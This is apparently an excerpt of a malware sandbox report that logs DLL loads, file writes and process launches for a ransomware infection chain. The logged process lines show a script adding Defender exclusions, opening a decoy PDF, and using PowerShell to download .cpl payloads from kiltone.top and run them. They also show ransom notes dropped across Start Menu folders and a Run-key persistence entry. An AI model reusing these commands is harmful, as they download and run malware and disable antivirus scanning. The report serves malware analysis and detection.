Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Google Drive.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: Z:\scvhost\Release\scvhost.pdb source: eryy65ty.exe, 00000020.00000000.1772450953.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000028.00000000.1925547868.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002B.00000000.2010314184.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.29.dr
Source: Binary string: Z:\lderd\Release\lderd.pdb source: fjeljies.cpl.13.dr
Source: Binary string: Z:\scvhost\Release\scvhost.pdbd source: eryy65ty.exe, 00000020.00000000.1772450953.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000028.00000000.1925547868.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002B.00000000.2010314184.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.29.dr

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData", "0", "true");IWshShell3.ExpandEnvironmentStrings("%temp%");IWshShell3.Run("powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData", "0", "true");IWshShell3.Run("cmd /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0", "0", "true");IWshShell3.ExpandEnvironmentStrings("%temp%");IWshShell3.Run("powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData", "0", "true");IWshShell3.Run("cmd /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.", "0", "true");IWshShell3.ExpandEnvironmentStrings("%temp%");IWshShell3.Run("powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData", "0", "true");IWshShell3.Run("cmd /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.", "0", "true");IWshShell3.Run("cmd /c control %temp%/fjeljies.cpl", "0", "true")
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cplJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\fjeljies.cplJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\eryy65ty.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\fjeljies.cplJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 585
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 585Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XPSUDTARW
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XPSUDTARW

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\SoftwareClient Private
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
